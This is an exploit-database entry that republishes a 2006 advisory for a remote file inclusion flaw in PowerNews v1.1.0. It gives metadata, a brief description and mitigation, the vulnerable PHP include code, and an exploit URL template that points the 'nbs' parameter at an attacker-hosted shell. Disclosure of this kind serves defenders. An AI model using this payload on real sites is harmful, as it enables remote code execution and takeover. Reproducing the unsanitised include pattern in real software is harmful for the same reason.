header-logo
Suggest Exploit
vendor:
PowerNews
by:
CvIr.System
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PowerNews
Affected Version From: PowerNews v1.1.0
Affected Version To: PowerNews v1.1.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PowerNews v1.1.0 (nbs) Remote File Inclusion

A remote file inclusion vulnerability exists in PowerNews v1.1.0 due to insufficient sanitization of user-supplied input to the 'nbs' parameter in the 'includes/global.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'nbs' parameter.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         PowerNews v1.1.0 (nbs) Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          Affected Software .: PowerNews v1.1.0
                          Download..: http://sourceforge.net/project/showfiles.php?group_id=35550                           
			  Class .............: Remote File Inclusion                                     
                          Risk ..............: high                              
                          Found by ..........: CvIr.System                                                  
                          Contact ...........: CvIr.System[at]gmail.com                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Affected File:                                                                
includes/global.php

 Vulnerable Code:

if(@fopen($nbs .'./includes/config.php', 'a'))
{
    die("config.php is writeable by your webserver, this is a possible security risk.");
}    

include($nbs .'./includes/config.php');
include($nbs .'./includes/auth.php');
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
                                                                      
    http://[target]/includes/global.php?nbs=[shell]? 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Special GreetingS:_ANtrAX_|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Quetzal|Hanowars|xarnuz|Slappter|by_emR3|mnox|Malvinas|Txis|The Shredder|FaLeNcE

# milw0rm.com [2006-09-21]